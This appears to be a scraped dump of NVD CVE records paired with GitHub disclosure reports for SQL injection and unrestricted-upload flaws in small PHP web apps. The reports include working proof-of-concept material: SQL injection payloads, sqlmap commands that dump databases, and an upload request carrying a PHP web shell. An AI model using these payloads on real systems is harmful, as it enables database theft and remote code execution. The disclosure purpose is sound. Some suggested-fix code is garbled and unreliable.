https://api.github.com/repos/CloudWise-OpenSource/FlyFish/issues/191/comments
0
2024-05-04T06:26:39Z
2024-05-04T06:26:39Z
https://github.com/CloudWise-OpenSource/FlyFish/issues/191
2,278,785,038
191
6,026
CVE-2024-5046
2024-05-17T13:15:59.540
A vulnerability was found in SourceCodester Online Examination System 1.0. It has been rated as critical. This issue affects some unknown processing of the file registeracc.php. The manipulation of the argument email leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-264743.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "cna@vuldb.com", "type": "Secondary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 7.3, "baseSeverity": "HIGH", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.4, "source": "cna@vuldb.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": [ { "cvssData": { "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "Safety": "NOT_DEFINED", "attackComplexity": "LOW", "attackRequirements": "NONE", "attackVector": "NETWORK", "availabilityRequirement": "NOT_DEFINED", "baseScore": 6.9, "baseSeverity": "MEDIUM", "confidentialityRequirement": "NOT_DEFINED", "exploitMaturity": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "privilegesRequired": "NONE", "providerUrgency": "NOT_DEFINED", "subAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "userInteraction": "NONE", "valueDensity": "NOT_DEFINED", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "version": "4.0", "vulnAvailabilityImpact": "LOW", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnerabilityResponseEffort": "NOT_DEFINED" }, "source": "cna@vuldb.com", "type": "Secondary" } ] }
[ { "source": "cna@vuldb.com", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/CveSecLook/cve/issues/32" }, { "source": "cna@vuldb.com", "tags": [ "Permissions Required", "VDB Entry" ], "url": "https://vuldb.com/?ctiid.264743" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?id.264743" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?submit.335527" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/CveSecLook/cve/issues/32" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Permissions Required", "VDB Entry" ], "url": "https://vuldb.com/?ctiid.264743" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?id.264743" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?submit.335527" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:warrendaloyan:online_examination_system:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "1AD6E663-A1BA-4328-BEBF-73C8D20DEA66", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "89" ]
89
https://github.com/CveSecLook/cve/issues/32
[ "Exploit", "Third Party Advisory" ]
github.com
[ "CveSecLook", "cve" ]
# SourceCodester Online Examination System Project 1.0 registeracc.php SQL injection vulnerability # NAME OF AFFECTED PRODUCT(S) + Online Examination System Project ## Vendor Homepage + https://www.sourcecodester.com/php/14351/online-examination-system-project.html # AFFECTED AND/OR FIXED VERSION(S) ## submitter + zebra11 ## Vulnerable File + registeracc.php ## VERSION(S) + V1.0 ## Software Link + https://www.sourcecodester.com/sites/default/files/download/razormist/online-polling-system.zip # PROBLEM TYPE ## Vulnerability Type + SQL injection ## Root Cause + The method on line 22 of the "registeracc.php" file retrieves the value of the user input "email" from the POST element. Then the value of this element will be passed to the code without proper purification or validation, and ultimately used for database queries in the method on line 27 of the "registeracc.php" file. This may lead to SQL injection attacks. + ![1](https://github.com/CveSecLook/cve/assets/148504790/a16c919b-e5d8-4f4a-abdf-7e0d2ed0d74c) ## Impact + Attackers can exploit this vulnerability to gain database privileges, which can result in a large amount of data in the database. If the other party's database has DBA privileges, it may lead to server host privileges being obtained. # DESCRIPTION + zebra11 discovered a significant security vulnerability in the Online Examination System Project, caused by inadequate protection of the "email" parameter in the "registeracc.php" file. This vulnerability could be exploited to inject malicious SQL queries, leading to unauthorized access and the extraction of sensitive information from the database. # No login or authorization is required to exploit this vulnerability # Vulnerability details and POC ## Payload + firstname=11&lastname=11&email=123@qq.com' AND (SELECT 2698 FROM (SELECT(SLEEP(5)))jmKW) AND 'pNgQ'='pNgQ&password=123456&ConfirmPassword=123456&submit=Register Account ``` Parameter: email (POST) Type: boolean-based blind Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: firstname=11&lastname=11&email=123@qq.com' RLIKE (SELECT (CASE WHEN (5510=5510) THEN 0x3132334071712e636f6d ELSE 0x28 END)) AND 'uaZm'='uaZm&password=123456&ConfirmPassword=123456&submit=Register Account Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: firstname=11&lastname=11&email=123@qq.com' AND (SELECT 2698 FROM (SELECT(SLEEP(5)))jmKW) AND 'pNgQ'='pNgQ&password=123456&ConfirmPassword=123456&submit=Register Account ``` + This is showing the payload implemented by running sqlmap + ![2](https://github.com/CveSecLook/cve/assets/148504790/22d3716f-738b-45d2-b16a-420e17ba57a2) + List all databases of the server using the constructed payload command using sqlmap ```bash python sqlmap.py -u "192.168.31.216:8115/registeracc.php" --data="firstname=11&lastname=11&email=123@qq.com&password=123456&ConfirmPassword=123456&submit=Register Account" -p email --dbms=mysql --risk=3 --level=5 --batch --dbs ``` + ![3](https://github.com/CveSecLook/cve/assets/148504790/f8a4cdce-0ed5-43cc-a0e1-3aa3d95f85df) + List all table names under the specified database 'poll' ```bash python sqlmap.py -u "192.168.31.216:8115/registeracc.php" --data="firstname=11&lastname=11&email=123@qq.com&password=123456&ConfirmPassword=123456&submit=Register Account" -p email --dbms=mysql --risk=3 --level=5 --batch -D poll --tables ``` + ![4](https://github.com/CveSecLook/cve/assets/148504790/f5b0f649-399e-4599-af11-28f1ea39d802)
SourceCodester Online Examination System Project 1.0 registeracc.php SQL injection vulnerability
https://api.github.com/repos/CveSecLook/cve/issues/32/comments
0
2024-05-15T16:50:17Z
2024-05-15T16:50:17Z
https://github.com/CveSecLook/cve/issues/32
2,298,393,646
32
6,027
CVE-2024-5049
2024-05-17T14:15:22.407
A vulnerability, which was classified as critical, has been found in Codezips E-Commerce Site 1.0. Affected by this issue is some unknown functionality of the file admin/editproduct.php. The manipulation of the argument profilepic leads to unrestricted upload. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-264746 is the identifier assigned to this vulnerability.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "PARTIAL", "baseScore": 6.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "cna@vuldb.com", "type": "Secondary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 6.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.4, "source": "cna@vuldb.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": [ { "cvssData": { "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "Safety": "NOT_DEFINED", "attackComplexity": "LOW", "attackRequirements": "NONE", "attackVector": "NETWORK", "availabilityRequirement": "NOT_DEFINED", "baseScore": 5.3, "baseSeverity": "MEDIUM", "confidentialityRequirement": "NOT_DEFINED", "exploitMaturity": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "privilegesRequired": "LOW", "providerUrgency": "NOT_DEFINED", "subAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "userInteraction": "NONE", "valueDensity": "NOT_DEFINED", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "version": "4.0", "vulnAvailabilityImpact": "LOW", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnerabilityResponseEffort": "NOT_DEFINED" }, "source": "cna@vuldb.com", "type": "Secondary" } ] }
[ { "source": "cna@vuldb.com", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/polaris0x1/CVE/issues/2" }, { "source": "cna@vuldb.com", "tags": [ "Permissions Required", "VDB Entry" ], "url": "https://vuldb.com/?ctiid.264746" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?id.264746" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?submit.335838" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/polaris0x1/CVE/issues/2" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Permissions Required", "VDB Entry" ], "url": "https://vuldb.com/?ctiid.264746" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?id.264746" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?submit.335838" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:codezips:e-commerce_site:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "448FA2B8-9265-4027-B054-7BCE8AD7278A", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "434" ]
434
https://github.com/polaris0x1/CVE/issues/2
[ "Exploit", "Third Party Advisory" ]
github.com
[ "polaris0x1", "CVE" ]
# Codezips E-commerce Site Using PHP With Source Code 1.0 admin/editproduct.php Unrestricted Upload # NAME OF AFFECTED PRODUCT(S) + E-commerce Site Using PHP With Source Code ## Vendor Homepage + https://codezips.com/php/e-commerce-site-using-php-with-source-code/ # AFFECTED AND/OR FIXED VERSION(S) ## submitter + polaris0x1 ## Vulnerable File + admin/editproduct.php ## VERSION(S) + V1.0 ## Software Link + https://codeload.github.com/codezips/ecommerce-site-using-php/zip/master # PROBLEM TYPE ## Vulnerability Type + File upload ## Root Cause + The input obtained from line 67 of the "/admin/editproduct.php" file is used in line 86 of the "/admin/editproduct.php" file to determine the location of the file to be written, which may allow attackers to change or damage the content of the file, or create a brand new file. + ![1](https://github.com/polaris0x1/CVE/assets/167133866/3b19bc43-4462-4476-bc41-9508fd4bf411) ## Impact + Attackers can exploit this vulnerability for unrestricted uploads, and remote attacks may result in RCE. # DESCRIPTION + polaris0x1 found that the file upload operation was triggered in admin/editproduct.php, and the _FAILES variable was used to receive the payload. After receiving the attack vector from a remote attacker, it will result in unrestricted uploads, and remote attacks may lead to RCE. # Vulnerability details and POC ## Payload + The picture I uploaded here is a photo of carrying a Trojan horse, but due to character confusion, I took a screenshot directly. + ![2](https://github.com/polaris0x1/CVE/assets/167133866/b234ae60-b7a2-42e8-88ac-a3cf6f406a5e) ``` POST /admin/editproduct.php?epid=57 HTTP/1.1 Host: 192.168.31.180:8201 Content-Length: 2200 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://192.168.31.180:8201 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryoMwmpThrkX3kjCeo User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://192.168.31.180:8201/admin/editproduct.php?epid=57 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 admin_login=borsha%40gmail.com Connection: close ------WebKitFormBoundaryoMwmpThrkX3kjCeo Content-Disposition: form-data; name="profilepic"; filename="rce.php" Content-Type: image/jpeg <?php system("ipconfig"); ?> ------WebKitFormBoundaryoMwmpThrkX3kjCeo Content-Disposition: form-data; name="updatepic" Change Picture ------WebKitFormBoundaryoMwmpThrkX3kjCeo-- ``` ## Burp screenshot + ![3](https://github.com/polaris0x1/CVE/assets/167133866/74d2725a-0e37-4fba-bdab-9a0bdd53452a) ## Uploading file name changes, it is speculated that it is a timestamp renaming mechanism + ![4](https://github.com/polaris0x1/CVE/assets/167133866/b1deaa11-9e8c-4f4a-a555-bfe48d14ee4d) + ![5](https://github.com/polaris0x1/CVE/assets/167133866/164913ef-7347-4d5a-9a9a-ca4e331a64a0) ## I successfully executed the PHP script on the terminal + ![6](https://github.com/polaris0x1/CVE/assets/167133866/40891e6f-6b34-47ee-a831-164e93a8d062)
Codezips E-commerce Site Using PHP With Source Code 1.0 admin/editproduct.php Unrestricted Upload
https://api.github.com/repos/ppp-src/CVE/issues/2/comments
0
2024-05-16T03:14:10Z
2024-05-16T03:14:10Z
https://github.com/ppp-src/CVE/issues/2
2,299,242,580
2
6,028
CVE-2024-5116
2024-05-20T04:15:09.070
A vulnerability, which was classified as critical, has been found in SourceCodester Online Examination System 1.0. Affected by this issue is some unknown functionality of the file save.php. The manipulation of the argument vote leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-265196.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "cna@vuldb.com", "type": "Secondary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 7.3, "baseSeverity": "HIGH", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.4, "source": "cna@vuldb.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": [ { "cvssData": { "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "Safety": "NOT_DEFINED", "attackComplexity": "LOW", "attackRequirements": "NONE", "attackVector": "NETWORK", "availabilityRequirement": "NOT_DEFINED", "baseScore": 6.9, "baseSeverity": "MEDIUM", "confidentialityRequirement": "NOT_DEFINED", "exploitMaturity": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "privilegesRequired": "NONE", "providerUrgency": "NOT_DEFINED", "subAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "userInteraction": "NONE", "valueDensity": "NOT_DEFINED", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "version": "4.0", "vulnAvailabilityImpact": "LOW", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnerabilityResponseEffort": "NOT_DEFINED" }, "source": "cna@vuldb.com", "type": "Secondary" } ] }
[ { "source": "cna@vuldb.com", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/polaris0x1/CVE/issues/3" }, { "source": "cna@vuldb.com", "tags": [ "Permissions Required", "VDB Entry" ], "url": "https://vuldb.com/?ctiid.265196" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?id.265196" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?submit.338578" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/polaris0x1/CVE/issues/3" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Permissions Required", "VDB Entry" ], "url": "https://vuldb.com/?ctiid.265196" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?id.265196" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?submit.338578" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:warrendaloyan:online_examination_system:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "1AD6E663-A1BA-4328-BEBF-73C8D20DEA66", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "89" ]
89
https://github.com/polaris0x1/CVE/issues/3
[ "Exploit", "Third Party Advisory" ]
github.com
[ "polaris0x1", "CVE" ]
# SourceCodester Online Polling System 1.0 save.php SQL injection vulnerability # NAME OF AFFECTED PRODUCT(S) + Online Examination System Project ## Vendor Homepage + https://www.sourcecodester.com/php/14351/online-examination-system-project.html # AFFECTED AND/OR FIXED VERSION(S) ## submitter + polaris0x1 ## Vulnerable File + save.php ## VERSION(S) + V1.0 ## Software Link + https://www.sourcecodester.com/sites/default/files/download/razormist/online-polling-system.zip # PROBLEM TYPE ## Vulnerability Type + SQL injection ## Root Cause + There is a typical SQL injection vulnerability in the save.php file of the project "Online Polling System". This vulnerability stems from the application's failure to properly clean and validate user input, directly using input data for database queries. In this code snippet, the variable $vote is the user input directly obtained through $REGUEST ['vote']. Due to the lack of any form of checking or escaping the content of $vote, malicious users can modify the structure of SQL queries by constructing special input values, thereby executing illegal SQL operations + ![1](https://github.com/polaris0x1/CVE/assets/167133866/b71fe4c3-76db-4641-9ba4-34e76611682b) ## Vulnerability code snippets ```PHP <?php require('connection.php'); $vote = $_REQUEST['vote']; mysqli_query($conn, "UPDATE tbCandidates SET candidate_cvotes=candidate_cvotes+1 WHERE candidate_name='$vote'"); mysqli_close($conn); ?> ``` + In the above code snippet, the variable $vote is the user input directly obtained through $REGUEST ['vote ']. Due to the lack of any form of checking or escaping the content of $vote, malicious users can modify the structure of SQL queries by constructing special input values, thereby performing illegal SQL operations. ## Impact + Attackers can exploit this SQL injection vulnerability to achieve unauthorized database access, sensitive data leakage, data tampering, comprehensive system control, and even service interruption, posing a serious threat to system security and business continuity. # DESCRIPTION + During the security review of the "Online Polling System" project, polaris0x1 discovered a significant vulnerability in the save.php file. The vote parameter lacks proper sanitization and validation, allowing attackers to inject malicious SQL queries and gain unauthorized database access. This can result in the modification of voting data and potential exposure of sensitive information. Immediate measures are needed to address this flaw and ensure data security and fairness in the voting process. # No login or authorization is required to exploit this vulnerability # Vulnerability details and POC ## Vulnerability type: + Time based blind SQL injection ## Vulnerability location: + 'vote' parameter ## Payload: ```bash vote=test 'AND (SELECT 5530 From (SELECT (SLEEP (5))) wnWB) -- AWBQ ``` + This Payload indicates that if the injected SQL command is true, the database will execute the 'SLEEP (5)' function, causing the query to pause for 5 seconds. This delay is crucial for detecting database response, as it determines whether injected SQL statements are executed by observing response time. ## Database Information: + DBMS: MySQL>=5.0.12 + Web server operating system: Windows + Web application technology: PHP 5.5.38, Apache 2.4.23 ``` Parameter: vote (GET) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: vote=test' AND (SELECT 5530 FROM (SELECT(SLEEP(5)))wnWB)-- AWBQ ``` + This is showing the payload implemented by running sqlmap + ![2](https://github.com/polaris0x1/CVE/assets/167133866/c674a7cb-e6e9-4a28-bf87-d44f7be59930) + List all databases of the server using the constructed payload command using sqlmap ```bash python sqlmap.py -u "http://192.168.31.216:8115/save.php?vote=test" --batch --risk=3 --level=5 --dbs ``` + ![3](https://github.com/polaris0x1/CVE/assets/167133866/70230ba1-cff1-4347-809f-ee01930a2d9a) + List all table names under the specified database 'poll' ```bash python sqlmap.py -u "192.168.31.216:8115/registeracc.php" --data="firstname=11&lastname=11&email=123@qq.com&password=123456&ConfirmPassword=123456&submit=Register Account" -p email --dbms=mysql --risk=3 --level=5 --batch -D poll --tables ``` + ![4](https://github.com/polaris0x1/CVE/assets/167133866/4863191f-fe05-4434-b042-ea9b58b86a1d) # Suggested repair ## Regarding the SQL injection vulnerability discovered in the 'save. php' file in the 'Online Polling System' project, the following are several practical suggested fix measures: ### 1 Using parameterized queries (Prepared Statements) + One of the most effective ways to prevent SQL injection attacks is to use parameterized queries. This method ensures that the structure of SQL commands is not altered by incoming data. In PHP, PDO (PHP Data Objects) or MySQL extensions can be used to implement parameterized queries. #### Example code (using PDO): ```PHP $stmt=$pdo ->prepare ('UPDATE tbCandidates SET candidate votes=candidate votes+1 WHERE candidate name=: vote '); $stmt ->execute (['vote '=>$vote]); ``` #### Example code (using MySQL): ```PHP $stmt=$conn ->prepare ('UPDATE tbCandidates SET candidate votes=candidate votes+1 WHERE candidate name=? '); $stmt ->bind_param ('s(), $vote); $stmt ->execute(); ``` ### 2 Strengthen input validation + Strict validation is crucial before processing any user input. Determine whether the input data conforms to the expected format and type, for example, if the 'vote' parameter should be a known candidate name, ensure that the input value strictly matches the candidate list. #### Example code: ```PHP $allowed_votes=['Candidate1 ',' Candidate2 ',' Candidate3 ']// Candidate list If (in array ($vote, $allowed_votes)){ //Perform database update operations }Else{ //Handling invalid inputs Echo "Invalid vote."; } ``` ### 3 Implement appropriate error handling + Avoid displaying SQL error messages in the user interface, which can be achieved through appropriate error handling. Ensure that error messages do not expose sensitive information and instead provide universal user-friendly errors. #### Example code: ```PHP Try{ //Perform database operations }Catch (PDOException $e){ //Record errors to log files Error log ($e ->getMessage ()); //Display general error messages to users Echo "An error occurred. Please try again later."; } ``` ### 4 Minimum permission principle + Ensure that the database account used by the application only has the minimum permissions to perform necessary operations. For example, if the application does not require permission to delete records, then the account should not have this permission.
SourceCodester Online Polling System 1.0 save.php SQL injection vulnerability
https://api.github.com/repos/ppp-src/CVE/issues/3/comments
0
2024-05-18T17:22:07Z
2024-05-18T17:22:07Z
https://github.com/ppp-src/CVE/issues/3
2,304,175,120
3
6,029
CVE-2024-5145
2024-05-20T23:15:08.533
A vulnerability was found in SourceCodester Vehicle Management System up to 1.0 and classified as critical. This issue affects some unknown processing of the file /newdriver.php of the component HTTP POST Request Handler. The manipulation of the argument file leads to unrestricted upload. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-265289 was assigned to this vulnerability.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "PARTIAL", "baseScore": 6.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "cna@vuldb.com", "type": "Secondary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 6.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.4, "source": 